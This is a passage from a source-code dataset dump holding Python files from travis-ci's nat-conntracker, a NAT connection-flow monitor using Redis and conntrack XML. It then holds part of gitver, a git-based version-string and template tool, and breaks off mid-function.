"text": "import json\nimport time\n\nimport redis\n\n__all__ = ['RedisSyncer']\n\n\nclass RedisSyncer(object):\n def __init__(self, logger, channel, conn_url='redis://localhost:6379/0'):\n self._logger = logger\n self._channel = channel\n self._conn = redis.from_url(conn_url)\n\n def pub(self, threshold, src, dst, count):\n return self._conn.publish(\n self._channel,\n json.dumps({\n 'threshold': threshold,\n 'src': src,\n 'dst': dst,\n 'count': count\n }))\n\n def sub(self, interval=0.01, is_done=None):\n is_done = is_done if is_done is not None else lambda: False\n psconn = self._conn.pubsub(ignore_subscribe_messages=True)\n psconn.subscribe(**{self._channel: self._handle_message})\n while True:\n psconn.get_message()\n if is_done():\n break\n time.sleep(interval)\n\n def _handle_message(self, message):\n if message['type'] != 'message':\n return\n\n try:\n msg = json.loads(message['data'].decode('utf-8'))\n self._logger.warn(\n ('over threshold={threshold} src={src} dst={dst} '\n 'count={count} source=sync').format(**msg))\n except Exception:\n self._logger.exception('failed to handle message')\n\n def ping(self):\n return self._conn.ping()\n"
},
{
"alpha_fraction": 0.5302897095680237,
"alphanum_fraction": 0.5513608455657959,
"avg_line_length": 25.488372802734375,
"blob_id": "48a9a0d6317b0920ff65269283449a192b4b47bc",
"content_id": "679ce925836d3cc34ddd5adfdd43a418a83920dd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1139,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 43,
"path": "/setup.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import codecs\nimport os\nimport sys\n\nfrom setuptools import setup\n\n_HERE = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts):\n with codecs.open(os.path.join(_HERE, *parts), 'r') as fp:\n return fp.read()\n\n\ndef main():\n setup(\n name='nat-conntracker',\n description='Conntrack XML eating NAT thing',\n long_description=read('README.rst'),\n author='Travis CI GmbH',\n author_email='[email protected]',\n license='MIT',\n url='https://github.com/travis-ci/nat-conntracker',\n use_scm_version=True,\n packages=['nat_conntracker'],\n setup_requires=['pytest-runner>=4.0', 'setuptools_scm>=1.15'],\n install_requires=['cachetools>=2.0', 'redis>=2.10'],\n tests_require=[\n 'codecov>=2.0', 'pytest-cov>=2.0', 'pytest-runner>=4.0',\n 'pytest>=3.4', 'yapf>=0.22'\n ],\n entry_points={\n 'console_scripts':\n ['nat-conntracker=nat_conntracker.__main__:main']\n },\n platforms=['any'],\n zip_safe=False,\n python_requires='>=3.5')\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n"
},
{
"alpha_fraction": 0.4521072804927826,
"alphanum_fraction": 0.4636015295982361,
"avg_line_length": 13.5,
"blob_id": "4377cb074b589f615299490a3c00d087a2736690",
"content_id": "0d4414bea1fa4841bdd386fd9aa79b17b15a4263",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 261,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 18,
"path": "/nat_conntracker/null_syncer.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import time\n\n__all__ = ['NullSyncer']\n\n\nclass NullSyncer(object):\n def __init__(self, *_, **__):\n pass\n\n def pub(self, *_):\n return 1\n\n def sub(self, **__):\n while True:\n time.sleep(10)\n\n def ping(self):\n pass\n"
},
{
"alpha_fraction": 0.624454140663147,
"alphanum_fraction": 0.6266375780105591,
"avg_line_length": 20.809524536132812,
"blob_id": "7527955b46b166f4cae60997a242b161fcc894ba",
"content_id": "4ae0b139b8c0029d1e437eb7d9f9a3490dc8cc9e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 916,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 42,
"path": "/conftest.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import os\nimport socket\nimport sys\n\nimport pytest\nimport redis\n\nsys.path.insert(0, os.path.abspath(os.path.dirname(__file__)))\n\n\[email protected](autouse=True)\ndef no_socket_gethostbyaddr(monkeypatch):\n monkeypatch.setattr(socket, 'gethostbyaddr', lambda a: 'somehost')\n\n\[email protected](autouse=True)\ndef no_redis_from_url(monkeypatch):\n monkeypatch.setattr(redis, 'from_url', lambda u: FakeRedisConn(u))\n\n\nclass FakeRedisConn(object):\n def __init__(self, url):\n self.url = url\n self._sets = {}\n\n def publish(self, *args):\n pass\n\n def pubsub(self, **kwargs):\n pass\n\n def ping(self):\n return b'PONG'\n\n def smembers(self, key):\n return self._sets.get(key, [])\n\n def sadd(self, key, value):\n if not key in self._sets:\n self._sets[key] = set()\n self._sets[key].add(str(value).encode('utf-8'))\n return len(self._sets[key])\n"
},
{
"alpha_fraction": 0.6951871514320374,
"alphanum_fraction": 0.7005347609519958,
"avg_line_length": 22.375,
"blob_id": "587d7848da0cff0f193d903bcef560a93a4f4280",
"content_id": "4b67fe0b29c145fa096b2b49d705384230c4869b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 187,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 8,
"path": "/tests/stats_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from nat_conntracker.stats import Stats\n\n\ndef test_stats_init():\n stats = Stats()\n assert stats.max_size > 0\n assert stats.counter is not None\n assert stats.index is not None\n"
},
{
"alpha_fraction": 0.5014727711677551,
"alphanum_fraction": 0.5036818981170654,
"avg_line_length": 30.581396102905273,
"blob_id": "7c0ac4f2f5e71e0117610b61cd3c3a49868f5b44",
"content_id": "d83c9541a806d1b17a43eb5ca71055b157b3f542",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2716,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 86,
"path": "/nat_conntracker/runner.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import signal\nimport time\n\nfrom threading import Thread\n\n__all__ = ['Runner']\n\n\nclass Runner(object):\n def __init__(self, conntracker, syncer, logger, **args):\n self._conntracker = conntracker\n self._syncer = syncer\n self._logger = logger\n self._args = args\n self._done = False\n self._handle_thread = None\n self._sub_thread = None\n\n def run(self):\n self._start_threads()\n\n try:\n signal.signal(signal.SIGUSR1, self._conntracker.dump_state)\n self._logger.info('entering sample loop '\n 'threshold={} top_n={} eval_interval={}'.format(\n self._args['conn_threshold'],\n self._args['top_n'],\n self._args['eval_interval']))\n self._run_sample_loop()\n except KeyboardInterrupt:\n self._logger.warn('interrupt')\n finally:\n signal.signal(signal.SIGUSR1, signal.SIG_IGN)\n self._logger.info('cleaning up')\n self._done = True\n self._conntracker.sample(self._args['conn_threshold'],\n self._args['top_n'])\n self._conntracker.cleanup()\n self._join()\n\n def _run_sample_loop(self):\n while True:\n self._conntracker.sample(self._args['conn_threshold'],\n self._args['top_n'])\n nextloop = time.time() + self._args['eval_interval']\n while time.time() < nextloop:\n self._join()\n if not self._is_alive():\n self._done = True\n return\n if self._is_done():\n return\n time.sleep(0.1)\n\n def _start_threads(self):\n self._handle_thread = Thread(target=self._handle)\n self._handle_thread.start()\n\n self._sub_thread = Thread(target=self._sub)\n self._sub_thread.daemon = True\n self._sub_thread.start()\n\n def _join(self):\n self._handle_thread.join(0.1)\n\n def _is_alive(self):\n return self._handle_thread.is_alive()\n\n def _is_done(self):\n return self._done\n\n def _handle(self):\n try:\n self._conntracker.handle(\n self._args['events'], is_done=self._is_done)\n except Exception:\n self._logger.exception('breaking out of handle wrap')\n finally:\n self._done = True\n\n def _sub(self):\n try:\n self._syncer.sub(is_done=self._is_done)\n except Exception:\n self._logger.exception('breaking out of sub wrap')\n self._done = True\n"
},
{
"alpha_fraction": 0.7224669456481934,
"alphanum_fraction": 0.7268722653388977,
"avg_line_length": 21.700000762939453,
"blob_id": "2b0e963dae187556fbb3c1a8a9882d65e42eb948",
"content_id": "f8e97d41d314ca00e230b0aa4b00b6528970505c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 227,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 10,
"path": "/Dockerfile",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "FROM python:3-alpine\n\nWORKDIR /app\n\nCOPY . .\nRUN pip install --no-cache-dir -r deploy-requirements.txt\n\nENV PATH /bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/app/bin\nENV PYTHONPATH /app\nCMD [\"nat-conntracker\"]\n"
},
{
"alpha_fraction": 0.5479345321655273,
"alphanum_fraction": 0.5526110529899597,
"avg_line_length": 33.67567443847656,
"blob_id": "0680b16c9da59e12a3a1e8cd07c242b408e838bc",
"content_id": "d4a87ed304e4c6ba037373e4c9c2df2b9be6146d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3849,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 111,
"path": "/nat_conntracker/conntracker.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import socket\n\nfrom ipaddress import ip_address\nfrom threading import Thread\n\nfrom .flow_parser import FlowParser\n\n__all__ = ['Conntracker']\n\n\nclass Conntracker(object):\n def __init__(self, logger, syncer, settings, healther, stats):\n self._logger = logger\n self._syncer = syncer\n self._settings = settings\n self._healther = healther\n self._stats = stats\n\n def handle(self, stream, is_done=None):\n FlowParser(self, self._logger).handle_events(stream, is_done=is_done)\n\n def cleanup(self):\n self._healther.cleanup()\n\n def sample(self, threshold, top_n):\n self._logger.info(f'begin sample threshold={threshold} top_n={top_n}')\n\n flow_count = 0\n for ((src, dst), count) in self._stats.top(n=top_n):\n flow_count += count\n if count >= threshold:\n self._logger.warn(f'over threshold={threshold} src={src} '\n f'dst={dst} count={count} '\n f'hostname={self._lookup_hostname(src)}')\n self._syncer.pub(threshold, src, dst, count)\n\n if flow_count >= self._settings.min_flow():\n self._healther.healthy('flow-count', ttl=300)\n else:\n self._healther.unhealthy('flow-count')\n\n self._stats.reset()\n self._logger.info(f'end sample threshold={threshold} top_n={top_n}')\n\n def handle_flow(self, flow):\n if flow is None:\n return\n\n if flow.flowtype != 'new':\n self._logger.debug(f'skipping flowtype={flow.flowtype}')\n # Only \"new\" flows are currently handled, meaning that any flows\n # of type \"update\" or \"destroy\" are ignored along with any of the\n # state changes they may describe.\n return\n\n (src, dst) = flow.src_dst()\n if src is None or dst is None:\n self._logger.debug('skipping flow without src dst')\n return\n\n src_addr = ip_address(src.host)\n dst_addr = ip_address(dst.host)\n\n for ign in self._settings.dst_ignore():\n if dst_addr in ign:\n self._logger.debug(\n f'ignoring dst match src={src_addr} dst={dst_addr}')\n return\n\n for ign in self._settings.src_ignore():\n if src_addr in ign:\n self._logger.debug(\n f'ignoring src match src={src_addr} dst={dst_addr}')\n return\n\n try:\n self._logger.debug(f'adding src={src_addr} dst={dst_addr}')\n self._stats.add(src, dst)\n except Exception as exc:\n self._logger.error(exc)\n\n def dump_state(self, *_):\n src_ign = self._settings.src_ignore()\n for i, ign in enumerate(sorted(src_ign)):\n self._logger.info(f'src_ign dump {i + 1}/{len(src_ign)} net={ign}')\n\n dst_ign = self._settings.dst_ignore()\n for i, ign in enumerate(sorted(dst_ign)):\n self._logger.info(f'dst_ign dump {i + 1}/{len(dst_ign)} net={ign}')\n\n self._logger.info(f'stats max_size={self._stats.max_size}')\n for i, ((src, dst), count) in enumerate(self._stats.top(10)):\n self._logger.info(\n f'stats dump {i + 1}/10 src={src} dst={dst} count={count}')\n\n def _lookup_hostname(self, ipv4, timeout=0.1):\n ret = {'hostname': 'notset'}\n fetch = Thread(target=self._build_hostname_fetch(ret, ipv4))\n fetch.start()\n fetch.join(timeout)\n return ret['hostname']\n\n def _build_hostname_fetch(self, ret, ipv4):\n def fetch():\n try:\n ret['hostname'] = socket.gethostbyaddr(ipv4)[0]\n except socket.herror:\n ret['hostname'] = 'unknown'\n self._logger.exception('failed to get hostname')\n\n return fetch\n"
},
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.702479362487793,
"avg_line_length": 12.44444465637207,
"blob_id": "f3000613b05fdbf1ebc0b57446638f71488645c5",
"content_id": "9a82eb29e106bef7fe5fa68474c63d200902d7d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 121,
"license_type": "permissive",
"max_line_length": 20,
"num_lines": 9,
"path": "/requirements.txt",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "cachetools>=2.0\nredis>=2.10\n\ncodecov>=2.0\npytest-cov>=2.0\npytest-runner>=4.0\npytest>=3.4\nsetuptools_scm>=1.15\nyapf>=0.22\n"
},
{
"alpha_fraction": 0.7588555812835693,
"alphanum_fraction": 0.7588555812835693,
"avg_line_length": 25.214284896850586,
"blob_id": "0800f53ab486e204cdd5199d04bed0f564e4beeb",
"content_id": "62c11b14fe126c7b3a85e4ff9d8207de4537c165",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 734,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 28,
"path": "/tests/conntracker_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport pytest\n\nfrom nat_conntracker.conntracker import Conntracker\nfrom nat_conntracker.flow_parser import Flow\n\n\[email protected]\ndef empty_conntracker():\n return Conntracker(None, None, None, None, None)\n\n\ndef test_conntracker_init(empty_conntracker):\n assert empty_conntracker._settings is None\n assert empty_conntracker._syncer is None\n assert empty_conntracker._logger is None\n assert empty_conntracker._stats is None\n\n\ndef test_conntracker_handle_flow(empty_conntracker):\n empty_conntracker._logger = logging.getLogger()\n\n assert empty_conntracker.handle_flow(None) is None\n\n empty_flow = Flow()\n empty_flow.flowtype = 'new'\n assert empty_conntracker.handle_flow(empty_flow) is None\n"
},
{
"alpha_fraction": 0.5718799233436584,
"alphanum_fraction": 0.5721432566642761,
"avg_line_length": 29.384000778198242,
"blob_id": "7908f9513e2681920e0dbaa433a2d09294e941c2",
"content_id": "db4c2e3c29b3e18f7dc41b7f17f15200d255676f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3798,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 125,
"path": "/nat_conntracker/flow_parser.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from collections import namedtuple\nfrom xml.dom.minidom import parseString as minidom_parse_string\nfrom xml.parsers.expat import ExpatError\n\n__all__ = ['FlowParser']\n\n\nclass FlowParser(object):\n def __init__(self, conntracker, logger):\n self._conntracker = conntracker\n self._logger = logger\n\n def handle_events(self, stream, is_done=None):\n is_done = is_done if is_done is not None else lambda: False\n for line in stream:\n try:\n dom = minidom_parse_string(line)\n for flow_node in dom.getElementsByTagName('flow'):\n self._conntracker.handle_flow(Flow.from_node(flow_node))\n except ExpatError as experr:\n self._logger.debug(f'expat error: {experr}')\n finally:\n self._logger.debug(f'checking is_done={is_done()}')\n if is_done():\n return\n\n\nFlowAddress = namedtuple('FlowAddress', ['host', 'port'])\n\n\nclass FlowMetaGeneric(object):\n def __init__(self):\n self.direction = ''\n\n def __repr__(self):\n return f'<{self.__class__.__name__} direction={repr(self.direction)}>'\n\n @classmethod\n def from_node(cls, meta_node):\n inst = cls()\n inst.direction = meta_node.getAttribute('direction')\n return inst\n\n\nclass FlowMetaOrigReply(object):\n def __init__(self):\n self.direction = ''\n self.src = None\n self.dst = None\n\n def __repr__(self):\n return f'<{self.__class__.__name__} direction={repr(self.direction)} ' \\\n f'src={repr(self.src)} dst={repr(self.dst)}>'\n\n @classmethod\n def from_node(cls, meta_node):\n inst = cls()\n inst.direction = meta_node.getAttribute('direction')\n inst.src = FlowAddress(\n _find_data(meta_node, 'src'), _find_data(meta_node, 'sport'))\n inst.dst = FlowAddress(\n _find_data(meta_node, 'dst'), _find_data(meta_node, 'dport'))\n return inst\n\n\nclass FlowMetaIndependent(object):\n direction = 'independent'\n\n def __init__(self):\n self.id = ''\n self.assured = False\n\n def __repr__(self):\n return f'<{self.__class__.__name__} id={repr(self.id)} ' \\\n f'assured={repr(self.assured)}>'\n\n @classmethod\n def from_node(cls, meta_node):\n inst = cls()\n inst.id = _find_data(meta_node, 'id')\n if len(meta_node.getElementsByTagName('assured')) > 0:\n inst.assured = True\n return inst\n\n\nclass Flow(object):\n def __init__(self):\n self.flowtype = ''\n self.meta = []\n\n def __repr__(self):\n return f'<{self.__class__.__name__} flowtype={repr(self.flowtype)} ' \\\n f'meta={repr(self.meta)}>'\n\n def src_dst(self):\n for meta in self.meta:\n if meta.direction != 'original':\n continue\n if meta.src is not None and meta.dst is not None:\n return (meta.src, meta.dst)\n return (None, None)\n\n @classmethod\n def from_node(cls, flow_node):\n inst = cls()\n inst.flowtype = flow_node.getAttribute('type')\n for meta_node in flow_node.getElementsByTagName('meta'):\n inst.meta.append(cls.meta_from_node(meta_node))\n return inst\n\n @staticmethod\n def meta_from_node(meta_node):\n return {\n 'original': FlowMetaOrigReply,\n 'reply': FlowMetaOrigReply,\n 'independent': FlowMetaIndependent\n }.get(meta_node.getAttribute('direction'),\n FlowMetaGeneric).from_node(meta_node)\n\n\ndef _find_data(node, parent_tag, default=''):\n for subnode in node.getElementsByTagName(parent_tag):\n if subnode.firstChild is not None:\n return subnode.firstChild.data\n return default\n"
},
{
"alpha_fraction": 0.5258215665817261,
"alphanum_fraction": 0.5352112650871277,
"avg_line_length": 13.199999809265137,
"blob_id": "f94a0b3d9a26d6393fcd35f64bb07b40c3c1ff83",
"content_id": "34696bb48250805c092cc63eb2cf56f6a265bc97",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 213,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 15,
"path": "/nat_conntracker/null_healther.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "__all__ = ['NullHealther']\n\n\nclass NullHealther:\n def ping(self):\n pass\n\n def cleanup(self):\n pass\n\n def healthy(self, key, ttl=60):\n pass\n\n def unhealthy(self, key):\n pass\n"
},
{
"alpha_fraction": 0.6589861512184143,
"alphanum_fraction": 0.7296466827392578,
"avg_line_length": 22.25,
"blob_id": "c6f693191535c8d624d742d6eddfa7ebfe00eaeb",
"content_id": "1163dbaf22ccb2747b24e3c2b1fa5d9e293b85a1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 651,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 28,
"path": "/tests/redis_settings_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from ipaddress import ip_network\n\nimport pytest\n\nfrom nat_conntracker.redis_settings import RedisSettings\n\n\[email protected]\ndef settings():\n return RedisSettings()\n\n\ndef test_redis_settings_init(settings):\n assert settings._conn is not None\n\n\ndef test_redis_settings_ping(settings):\n assert settings.ping() == b'PONG'\n\n\ndef test_redis_settings_src_ignore(settings):\n settings.add_ignore_src('123.145.0.0/16')\n assert ip_network('123.145.0.0/16') in settings.src_ignore()\n\n\ndef test_redis_settings_dst_ignore(settings):\n settings.add_ignore_dst('167.189.0.0/16')\n assert ip_network('167.189.0.0/16') in settings.dst_ignore()\n"
},
{
"alpha_fraction": 0.5357142686843872,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 13,
"blob_id": "6b796865186b5e26771142502f53a65688dac1f9",
"content_id": "b3d12c556255455da4765af0c0f33c866c400be5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 28,
"license_type": "permissive",
"max_line_length": 15,
"num_lines": 2,
"path": "/deploy-requirements.txt",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "cachetools>=2.0\nredis>=2.10\n"
},
{
"alpha_fraction": 0.568236231803894,
"alphanum_fraction": 0.5794094204902649,
"avg_line_length": 26.844444274902344,
"blob_id": "96d8a17ec20b955767c9ee7903dc8183a1234ed9",
"content_id": "3c78776c0046f7f0c685ab1f9835f120b78929e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1253,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 45,
"path": "/nat_conntracker/redis_settings.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from ipaddress import ip_network\n\nimport redis\nfrom cachetools.func import ttl_cache\n\n__all__ = ['RedisSettings']\n\n\nclass RedisSettings(object):\n def __init__(self,\n namespace='nat-conntracker',\n conn_url='redis://localhost:6379/0'):\n self._namespace = namespace\n self._conn = redis.from_url(conn_url)\n\n def ping(self):\n return self._conn.ping()\n\n @ttl_cache(ttl=30)\n def src_ignore(self):\n return self._get_networks('src-ignore')\n\n @ttl_cache(ttl=30)\n def dst_ignore(self):\n return self._get_networks('dst-ignore')\n\n def add_ignore_src(self, src):\n return self._add_ignore('src-ignore', src)\n\n def add_ignore_dst(self, dst):\n return self._add_ignore('dst-ignore', dst)\n\n @ttl_cache(ttl=30)\n def min_flow(self, default=10):\n return int(self._conn.get(f'{self._namespace}:min-flow') or default)\n\n def _get_networks(self, key):\n return [\n ip_network(s.decode('utf-8'))\n for s in filter(lambda s: s.strip() != b'',\n self._conn.smembers(f'{self._namespace}:{key}'))\n ]\n\n def _add_ignore(self, key, value):\n self._conn.sadd(f'{self._namespace}:{key}', str(value))\n"
}
] | 27 |
nexiles/gitver
|
https://github.com/nexiles/gitver
|
36c4469e84baf000b10b3e35f5aaa9c861a71522
|
143e134280378bd850a2dd9af57700977756699a
|
f9ee481cd25dcf7c5d87c5834fa787c18b675cf5
|
refs/heads/master
| 2021-01-17T10:52:58.781620 | 2014-01-06T13:54:21 | 2014-01-06T13:54:21 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.563979983329773,
"alphanum_fraction": 0.5658014416694641,
"avg_line_length": 37.19130325317383,
"blob_id": "04293d1534c588ddd872256ba1af34e105c045bd",
"content_id": "c05aaa8b94460149569d0a51a7f7961bda99e6c9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4392,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 115,
"path": "/gitver",
"repo_name": "nexiles/gitver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n\n\"\"\"\ngitver - version strings management for humans\nManuel Bua\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\n\"\"\"\n\nimport sys\nimport argparse\nfrom config import cfg\nfrom sanity import check_config, check_gitignore, check_project_root\nfrom commands import cmd_build_template, cmd_clean, cmd_cleanall, cmd_info, \\\n cmd_init, cmd_list_next, cmd_list_templates, cmd_next, cmd_version\nfrom termcolors import warn\n\n\ndef main():\n check_project_root()\n\n # inject the default action \"info\" if none specified\n if (len(sys.argv) < 2 or\n len(sys.argv) == 2 and sys.argv[1] == '--ignore-gitignore'):\n sys.argv.append('info')\n\n args = parse_args()\n\n # avoid check if 'init' command\n if not 'init' in sys.argv:\n\n check_config()\n exit_on_error = args.func in [cmd_next, cmd_clean, cmd_cleanall]\n if not args.ignore_gitignore:\n check_gitignore(exit_on_error)\n else:\n print warn(\"(ignoring .gitignore warning)\")\n\n return args.func(args)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--ignore-gitignore',\n help='Ignore the .gitignore warning and continue '\n 'running as normal (specify this flag before '\n 'any other command, at YOUR own risk)',\n dest='ignore_gitignore',\n default=False,\n action='store_true')\n\n sp = parser.add_subparsers(title='Valid commands')\n\n add_command(sp, 'version', \"Show gitver version\", cmd_version)\n add_command(sp, 'init', \"Create gitver's configuration directory\", cmd_init)\n\n add_command(sp, 'info', \"Print version information for this repository \"\n \"[default]\",\n cmd_info)\n\n add_command(sp, 'list-templates', \"Enumerates available templates\",\n cmd_list_templates)\n\n add_command(sp, 'list-next', \"Enumerates NEXT custom strings\",\n cmd_list_next)\n\n p = add_command(sp, 'update', \"Perform simple keyword substitution on the \"\n \"specified template file(s) and place it to \"\n \"the path described by the first line in the \"\n \"template.\", cmd_build_template)\n p.add_argument('templates', default='', type=str)\n\n p = add_command(sp, 'next', \"Sets the NEXT version numbers for the \"\n \"currently reachable last tag. This will \"\n \"suppress the usage of the \\\"-\" +\n cfg['next_suffix'] +\n \"\\\" suffix, enable use of the custom \\\"-\" +\n cfg['next_custom_suffix'] +\n \"\\\" suffix and will use the supplied version \"\n \"numbers instead.\", cmd_next)\n p.add_argument('next_version_numbers', default='', type=str)\n\n p = add_command(sp, 'clean', \"Resets the NEXT custom string for the \"\n \"currently active tag, or the specified tag, \"\n \"to a clean state. Usage of the \\\"-\" +\n cfg['next_suffix'] + \"\\\" suffix is restored.\",\n cmd_clean)\n p.add_argument('tag', nargs='?', type=str, default='')\n\n add_command(sp, 'cleanall', \"Resets all the NEXT custom strings for this\"\n \"repository. Usage of the \\\"-\" +\n cfg['next_suffix'] +\n \"\\\" suffix is restored.\", cmd_cleanall)\n return parser.parse_args()\n\n\ndef add_command(parent, name, desc, func):\n p = parent.add_parser(name, help=desc)\n p.set_defaults(func=func)\n return p\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n"
},
{
"alpha_fraction": 0.5571503043174744,
"alphanum_fraction": 0.5610647201538086,
"avg_line_length": 28.821012496948242,
"blob_id": "eaf6cdb6627a49736aad8f60c6771da01c625865",
"content_id": "f76e16075ac41202bb329645e1c4333e4a793716",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7664,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 257,
"path": "/commands.py",
"repo_name": "nexiles/gitver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# coding=utf-8\n\n\"\"\"\nDefines gitver commands\n\"\"\"\n\nimport re\nimport os\nimport sys\nfrom termcolors import *\nfrom git import get_repo_info\nfrom storage import KVStore\nfrom sanity import check_gitignore\nfrom string import Template\nfrom defines import CFGDIR, PRJ_ROOT\nfrom config import cfg\n\n# file where to store NEXT strings <=> TAG user-defined mappings\nNEXT_STORE_FILE = os.path.join(CFGDIR, \".next_store\")\nTPLDIR = os.path.join(CFGDIR, 'templates')\n\nuser_version_matcher = r\"v{0,1}(\\d+)\\.(\\d+)\\.(\\d+)$\"\n\n# try import version information\ntry:\n from version import gitver_version, gitver_buildid\nexcept ImportError:\n gitver_version = 'n/a'\n gitver_buildid = 'n/a'\n\n\ndef template_path(name):\n return os.path.join(TPLDIR, name)\n\n\ndef parse_templates(templates, repo, next_custom):\n for t in templates.split(' '):\n tpath = template_path(t)\n if os.path.exists(tpath):\n with open(tpath, 'r') as fp:\n lines = fp.readlines()\n\n if len(lines) < 2:\n print err(\"The template \" + bold(t) + \" is not valid\")\n return\n\n output = str(lines[0]).strip(' #\\n')\n if not os.path.exists(os.path.dirname(output)):\n print err(\"The template output directory \\\"\" + bold(output) +\n \"\\\"\" + \"doesn't exists.\")\n\n print \"Processing template \\\"\" + bold(t) + \"\\\" for \" + output + \\\n \"...\"\n\n lines = lines[1:]\n\n xformed = Template(\"\".join(lines))\n vstring = build_version_string(repo, next_custom)\n\n # this should NEVER fail\n if not next_custom is None:\n user = user_numbers_from_string(next_custom)\n if not user:\n print err(\"Invalid custom NEXT version numbers detected, \"\n \"this should NEVER happen at this point!\")\n sys.exit(1)\n\n keywords = {\n 'CURRENT_VERSION': vstring,\n 'BUILD_ID': repo['build-id'],\n 'FULL_BUILD_ID': repo['full-build-id'],\n 'MAJOR': repo['maj'] if next_custom is None else int(user[0]),\n 'MINOR': repo['min'] if next_custom is None else int(user[1]),\n 'PATCH': repo['patch'] if next_custom is None else int(user[2]),\n 'COMMIT_COUNT': repo['count']\n }\n\n res = xformed.substitute(keywords)\n\n # resolve relative paths to the project's root\n if not os.path.isabs(output):\n output = os.path.join(PRJ_ROOT, output)\n\n try:\n fp = open(output, 'w')\n fp.write(res)\n fp.close()\n except IOError:\n print err(\"Couldn't write file \\\"\" + output + \"\\\"\")\n\n stat = os.stat(output)\n print \"Done, \" + str(stat.st_size) + \" bytes written.\"\n else:\n print err(\"Couldn't find the \\\"\" + t + \"\\\" template\")\n\n\ndef user_numbers_from_string(user):\n try:\n data = re.match(user_version_matcher, user).groups()\n if len(data) != 3:\n raise AttributeError\n except AttributeError:\n return False\n return data\n\n\ndef build_version_string(repo, next_custom=None):\n in_next = repo['count'] > 0\n if in_next and not next_custom is None and len(next_custom) > 0:\n version = next_custom\n version += \"-\" + cfg['next_custom_suffix']\n else:\n version = \"%d.%d.%d\" % (repo['maj'], repo['min'], repo['patch'])\n if in_next:\n version += \"-\" + cfg['next_suffix']\n\n if in_next:\n version += \"-\" + str(repo['count'])\n\n version += \"/\" + repo['build-id']\n\n return version\n\n\ndef cmd_version(args):\n print \"This is gitver \" + bold(gitver_version)\n print \"Full build ID is \" + bold(gitver_buildid)\n\n\ndef cmd_init(args):\n i = 0\n\n if not 